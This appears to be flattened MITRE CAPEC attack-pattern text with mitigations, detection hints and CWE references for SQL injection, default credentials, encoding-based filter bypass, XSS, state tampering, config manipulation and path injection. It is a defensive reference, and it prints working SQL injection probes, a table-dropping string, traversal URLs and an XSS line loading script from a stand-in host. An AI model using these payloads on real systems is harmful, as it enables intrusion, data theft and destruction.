Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Availability
DoS: resource consumption (memory)
Denial of Service
250
Targeted
264
Targeted
15
Secondary
CVE-2004-0213
Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908.
1000
Attack Pattern
ChildOf
CanPrecede
8
1000
Attack Pattern
ChildOf
CanPrecede
9
1000
Attack Pattern
ChildOf
CanPrecede
10
1000
Attack Pattern
ChildOf
CanPrecede
67
1000
Category
ChildOf
232
A user must be authenticated if she invokes a privileged program.
Reluctance to Trust
Least Privilege
Fail Securely
Defense in Depth
Any guideline related to the buffer overflow and format String vulnerability.
Patch programs with the latest patches from Vendors.
Ensure log integrity
Validate all untrusted input
Exploitation
High
High
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-214: Failure to protect stored data from modification
Draft
The MITRE Corporation
http://cwe.mitre.org/data/definitions/214.html
Common Weakness Enumeration (CWE)
CWE-15: Setting manipulation
Draft
The MITRE Corporation
http://cwe.mitre.org/data/definitions/15.html
Common Weakness Enumeration (CWE)
CWE-250: Often Misused: Privilege Management
Draft
The MITRE Corporation
http://cwe.mitre.org/data/definitions/250.html
Common Weakness Enumeration (CWE)
CWE-264: Permissions, Privileges, and Access Controls
Draft
The MITRE Corporation
http://cwe.mitre.org/data/definitions/264.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the attacker constructs input strings that probe the target through simple Boolean SQL expressions. The attacker can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the attacker determines how and where the target is vulnerable to SQL Injection.
For example, an attacker may try entering something like "username' AND 1=1; --" in an input field. If the result is the same as when the attacker entered "username" in the field, then the attacker knows that the application is vulnerable to SQL Injection. The attacker can then ask yes/no questions from the database server to extract information from it. For example, the attacker can extract table names from a database using the following types of queries:
"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108".
If the above query executes properly, then the attacker knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the attacker knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the attacker can determine all table names in the database. Subsequently, the attacker may execute an actual attack and send something like:
"username'; DROP TABLE trades; --
Hypothesize SQL queries in application
Generated hypotheses regarding the SQL queries in an application. For example, the attacker may hypothesize that his input is passed directly into a query that looks like:
"SELECT * FROM orders WHERE ordernum = _____"
or
"SELECT * FROM orders WHERE ordernum IN (_____)"
or
"SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____"
Of course, there are many other possibilities.
Research types of SQL queries and determine which ones could be used at various places in an application.
env-All
Determine how to inject information into the queries
Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:
"5' OR 1=1; --"
and
"5) OR 1=1; --"
and
"ordernum DESC; --"
Add clauses to the SQL queries such that the query logic does not change.
env-All
Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not.
env-All
At least one way to complete a hypothesized SQL query that would violate the application developer's assumptions.
Determine user-controllable input susceptible to injection
Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the attacker knows that the SQL injection was successful.
Use web browser to inject input through text fields or through HTTP GET parameters.
env-Web
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
env-Web
Use network-level packet injection tools such as netcat to inject input
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Use modified client (modified by reverse engineering) to inject input.
env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Response takes expected amount of time after delay is injected.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
At least one user-controllable input susceptible to injection found.
No user-controllable input susceptible to injection found.
Unusual queries such as the ones described in the previous step, in application logs. Log files may contain unusual messages such as "User bob' OR 1=1; -- logged in". Operators should be alerted when such SQL commands appear in the logs.
Input validation of user-controlled data before including it in a SQL query
Use APIs that help mitigate SQL injection (such as PreparedStatement in Java)
Determine database type
Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries
Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Inject other database-specific commands into input fields susceptible to SQL Injection. The attacker can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the attacker received a normal response from the server or not).
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Success outcome in previous step
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in previous step
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Database platform in use discovered.
Database platform in use not discovered.
Extract information about database schema
Extract information about database schema by getting the database to answer yes/no questions about the schema.
Automatically extract database schema using a tool such as Absinthe.
env-Web
Manually perform the blind SQL Injection to extract desired information about the database schema.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Success outcome in previous step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in previous step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Desired information about database schema extracted.
Desired information about database schema could not be extracted.
Large number of unusual queries in database logs.
Exploit SQL Injection vulnerability
Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database
Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Success outcome in previous step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in previous step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker achieves goal of unauthorized system access, denial of service, etc.
Attacker cannot exploit the information gathered by blind SQL Injection
SQL queries used by the application to store, retrieve or modify data.
User-controllable input that is not properly validated by the application as part of SQL queries.
High
High
Injection
Analysis
In the PHP application TimeSheet 1.1, an attacker can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the attacker is aware of the local path structure, the attacker can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file.
CVE-2006-4705
Medium
Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages.
None
In order to determine the right syntax for the query to inject, the attacker tries to determine the right number of parameters to the query and their types. This is achieved by formulating conditions that result in a true/false answer from the database. If the logical condition is true, the database will execute the rest of the query. If not, a custom error page or a default page is returned. Another approach is to ask such true/false questions of the database and note the response times to a query with a logically true condition and one with a false condition.
The only indicators of successful Blind SQL Injection are the application or database logs that show similar queries with slightly differing logical conditions that increase in complexity over time. However, this requires extensive logging as well as knowledge of the queries that can be used to perform such injection and return meaningful information from the database.
Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.
Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.
Integrity
Modify application data
Confidentiality
Read application data
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
User-controllable input to the application
SQL statements intended to bypass checks or retrieve information about the database
Back-end database
The injected SQL statements are such that they result in a true/false query to the database. If the database evaluates a statement to be logically true, it responds with the requested data. If the condition is evaluated to be logically false, an error is returned. The attacker modifies the Boolean condition each time to gain information from the database.
89
Targeted
209
Targeted
74
Secondary
20
Secondary
390
Secondary
697
Secondary
713
Secondary
707
Secondary
1000
Attack Pattern
CanPrecede
66
1000
Attack Pattern
ChildOf
66
Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database.
Special characters in user-controllable input must be escaped before use by the application.
Employ application-level safeguards to filter data and handle exceptions gracefully.
Reluctance to Trust
Failing Securely
Defense in Depth
Never Use Input as Part of a Directive to any Internal Component
Handle All Errors Safely
Penetration
High
High
High
All
All
All
All
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Common Weakness Enumeration (CWE)
CWE-390 - Improper Error Handling
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/390.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may try certain common (default) usernames and passwords to gain access into the system and perform unauthorized actions. An attacker may try an intelligent brute force using known vendor default credentials as well as a dictionary of common usernames and passwords.
Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.
The system uses one factor password based authentication.
High
Medium
Brute Force
User Bob sets his password to "123". If the system does not have password strength enforcement against a sound password policy, this password may be admitted. A simple numeric sequence like this is one of the most common passwords and is easily guessable by an attacker.
Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username "root" with a password "password". This allows remote attackers to easily obtain administrative privileges.
CVE-2006-5288
Low
An attacker just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known.
Technology or vendor specific list of default usernames and passwords.
Try to determine what products are used in the implementation of the system. Determine if there are any default accounts associated with those products.
Many incorrect login attempts are detected by the system.
Try to spoof IP addresses so that it does not look like the incorrect log in attempts are coming from the same computer.
Delete all default account credentials that may be put in by the product vendor.
Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.
Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.
Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
521
Targeted
262
Targeted
263
Targeted
798
Targeted
693
Targeted
1000
Attack Pattern
ChildOf
49
Failing Securely
Penetration
High
High
Medium
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.
Survey the application for user-controllable inputs
Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application.
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Inputs are used by the application or the browser (DOM)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe entry points to locate vulnerabilities
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.
Try to use Unicode encoding of content in Scripts in order to bypass validation routines.
env-Web
Try to use Unicode encoding of content in HTML in order to bypass validation routines.
env-Web
Try to use Unicode encoding of content in CSS in order to bypass validation routines.
env-Web
The application accepts user-controllable input.
env-Web
The attacker's Unicode encoded payload is processed and acted on by the application without filtering or transcoding
The application decodes the charset and filters the inputs.
Implement input validation routines that filter or transcode for Unicode content.
Specify the charset of the HTTP transaction/content.
Monitor inputs to web servers. Alert on unusual charset and/or characters.
Actively monitor the application and either deny or redirect requests from origins that appear to be attack attempts.
Filtering is performed on data that has not be properly canonicalized.
High
Medium
Modification of Resources
API Abuse
Injection
Attack Example: Unicode Encodings in the IIS Server
A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is
http://target.server/some_directory/../../../winnt
In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.
In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are
. yields C0 AE
/ yields C0 AF
\ yields C1 9C
Using this conversion, the previously displayed URL can be encoded as
http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winnt
CVE-2000-0884
Medium
An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware.
Unicode encoded data is passed to APIs where it is not expected
Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.
Ensure that filtering or input validation is applied to canonical data.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system.
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify application data
Availability
DoS: crash / exit / restart
176
Targeted
171
Targeted
179
Targeted
180
Targeted
173
Targeted
172
Targeted
184
Targeted
183
Targeted
74
Targeted
20
Targeted
697
Targeted
692
Targeted
1000
Attack Pattern
PeerOf
64
1000
Attack Pattern
PeerOf
79
1000
Attack Pattern
PeerOf
72
1000
Attack Pattern
PeerOf
43
1000
Attack Pattern
ChildOf
267
Canonicalize data prior to performing any validation or filtering on it. Be aware of alternate encodings.
Penetration
Medium
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).
The attacker accesses the server using a specific URL.
The attacker tries to encode some special characters in the URL. The attacker finds out that some characters are not filtered properly.
The attacker crafts a malicious URL string request and sends it to the server.
The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters may have harmful consequences.
The application should accepts and decodes URL input.
The application performs insufficient filtering/canonicalization on the URLs.
High
High
Injection
Protocol Manipulation
API Abuse
Attack Example: URL Encodings in IceCast MP3 Server.
The following type of encoded string has been known traverse directories against the IceCast MP3 server9:
http://[targethost]:8000/somefile/%2E%2E/target.mp3
or using
"/%25%25/" instead of "/../".
The control character ".." can be used by an attacker to escape the document root.
CVE-2001-0784
Cross-Site Scripting
URL-Encoded attack:
http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution:
<script src="http://www.badplace.com/nasty.js"></script>
[R.72.3][REF-35]
SQL Injection
Original database query in the example file - "login.asp":
SQLQuery = "SELECT preferences FROM logintable WHERE userid='" & Request.QueryString("userid") & "' AND password='" & Request.QueryString("password") & "';"
URL-encoded attack:
http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00
Executed database query:
SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';
From "URL encoded attacks", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html
Low
An attacker can try special characters in the URL and bypass the URL validation.
Medium
The attacker may write a script to defeat the input filtering mechanism.
An attacker can manually inject special characters in the URL string request and observe the results of the request.
Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
Automated tools such as fuzzer can be used to test the URL decoding and filtering.
If the first decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious.
Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.
Sometime the percent escaping can be used to obfuscate the attack itself.
Alternative method of data encoding can be used.
Obfuscation technique such as IP address encoding can also be used (See reference section : "URL encoded attacks", by Gunter Ollmann).
Refer to the RFCs to safely decode URL.
Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.
There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).
Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.
Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)
When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible.
Confidentiality
Read files or directories
Availability
DoS: resource consumption (memory)
Denial of Service
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
173
Targeted
177
Targeted
171
Targeted
172
Targeted
73
Targeted
21
Targeted
74
Targeted
20
Targeted
1000
Attack Pattern
PeerOf
79
1000
Attack Pattern
PeerOf
71
1000
Attack Pattern
PeerOf
43
1000
Attack Pattern
ChildOf
267
Reluctance to Trust
Penetration
Exploitation
High
High
Medium
Client-Server
SOA
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Gunter Ollmann
URL Encoded Attacks - Attacks using the common web browser
CGISecurity.com
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html
T. Berners-Lee
R. Fielding
L. Masinter
RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax
January 2005
http://www.ietf.org/rfc/rfc3986.txt
T. Berners-Lee
L. Masinter
M. McCahill
RFC 1738 - Uniform Resource Locators (URL)
December 1994
http://www.ietf.org/rfc/rfc1738.txt
HTML URL Encoding Reference
W3Schools.com
Refsnes Data
http://www.w3schools.com/tags/ref_urlencode.asp
The URLEncode and URLDecode Page
Albion Research Ltd
http://www.albionresearch.com/misc/urlencode.php
David Wheeler
Secure Programming for Linux and Unix HOWTO
5.11.4. Validating Hypertext Links (URIs/URLs)
http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type involves an attacker inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
The victim must trust the name and locale of user controlled filenames.
High
High
Modification of Resources
Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment.
Low
To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename
Medium
Deploying a malicious "look-a-like" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into.
High
Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.
Design: Use browser technologies that do not allow client side scripting.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Scan dynamically generated content against validation specification
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Availability
Alter execution logic
Confidentiality
Read application data
Payload delivered through user controlled filename.
Command(s) executed directly on host
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
20
Targeted
184
Secondary
96
Targeted
348
Targeted
116
Targeted
350
Targeted
86
Secondary
697
Targeted
1000
Attack Pattern
ChildOf
63
1000
Attack Pattern
ChildOf
165
Penetration
Exploitation
High
High
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker modifies state information maintained by the target software in user-accessible locations. If successful, the target software will use this tainted state information and execute in an unintended manner.
State management is an important function within an application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart.
Manipulating user state can be employed by an attacker to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.
Attacker determines the nature of state management employed by the application. This includes determining the location (client-side, server-side or both) and possibly the items stored as part of user state
The attacker now tries to modify the user state contents (possibly blindly if the contents are encrypted or otherwise obfuscated) and observe the effects of this change on the application.
Having determined the information stored in the user state and the possible ways to modify it, the attacker can violate it in order to perform illegitimate actions.
High
Medium
Analysis
Modification of Resources
Upon authenticating a user, an application stores the authentication decision (auth=0/1) in a cookies unencrypted. At every request, this cookie is checked to permit or deny a request.
An attacker can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.
Medium
The attacker needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way.
No special resources are required. An attacker can choose to use a data tampering tool to aid in the attack.
Analysis: The attacker observes contents of client-side user state variables, stored in cookies or hidden fields or query strings, and modifies them in order to observe their effect on the application.
Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state
Do not store sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.
At all times sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
User-controllable user state variables
Modified or injected user state variables
State management mechanism of the application
Altered user state leading to information leak or elevated privilege
372
Secondary
371
Targeted
315
Targeted
353
Targeted
693
Targeted
CVE-2005-4448
FlatNuke 2.5.6 verifies authentication credentials based on an MD5 checksum of the admin name and the hashed password rather than the plaintext password, which allows attackers to gain privileges by obtaining the password hash (possibly via CVE-2005-2813), then calculating the credentials and including them in the secid cookie.
1000
Category
ChildOf
172
Protect user state that is stored client-side with integrity checks to ensure that a malicious user cannot gain unauthorized access to parts of the application
Authenticate every request to ensure that it is coming from a legitimate user and that the request is a valid one in the current context.
Reluctance To Trust
Never Assuming That Your Secrets Are Safe
Treat the Entire Inherited Process Context as Unvalidated Input
Use Well-Known Cryptography Appropriately and Correctly
Exploitation
High
High
Medium
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.
Configuration files must be modifiable by the attacker
Very High
High
Modification of Resources
The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml
< CustomRealm
ConfigurationData="java.util.Properties"
Name="CustomRealm"
RealmClassName="Maliciousrealm.jar"
/>
The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.
Medium
To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence
Design: Enforce principle of least privilege
Design: Backup copies of all configuration files
Implementation: Integrity monitoring for configuration files
Implementation: Enforce audit logging on code and configuration promotion procedures.
Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Configuration files
Commands or configuration settings
Configuration file processing routines
Enables attacker to execute server side code with any commands that the program owner has privileges to.
349
Targeted
99
Targeted
77
Targeted
346
Targeted
353
Secondary
354
Secondary
713
Targeted
1000
Category
ChildOf
233
1000
Attack Pattern
ChildOf
176
Exploitation
High
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
Fingerprinting of the operating system
In order to create a valid file injection, the attacker needs to know what the underlying OS is.
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
env-Local env-CommProtocol env-Peer2Peer env-ClientServer
TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, he attempts to guess the actual operating system.
env-Embedded env-CommProtocol env-Peer2Peer env-ClientServer env-Web
Induce errors to find informative error messages
env-All
The target software accepts connections via the network.
env-Embedded env-CommProtocol env-Peer2Peer env-ClientServer env-Web
Operating environment (operating system, language, and/or middleware) is correctly identified.
Multiple candidate operating environments are suggested.
Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems).
Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software.
Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection.
Survey the Application to Identify User-controllable Inputs
The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user
Spider web sites for all available links, entry points to the web site.
env-Web
Manually explore application and inventory all application inputs
env-All
The attacker develops a list of likely interesting path (application or OS related)
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Vary inputs, looking for malicious results
Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application
Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)
env-CommProtocol env-Web env-Peer2Peer env-ClientServer
Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests
env-Web
Inject context-appropriate malicious file system control syntax
env-CommProtocol env-Web env-Peer2Peer env-ClientServer
Inventorying in prior step is successful.
env-All
One or more injections that are appropriate to the platform provoke an unexpected response from the software, which can be varied by the attacker based on the input.
Manipulate files accessible by the application
The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)
The attacker injects context-appropriate malicious file path to access the content of the targeted file.
env-All
The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.
env-All
The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.
env-All
The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.
env-All
The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.
env-All
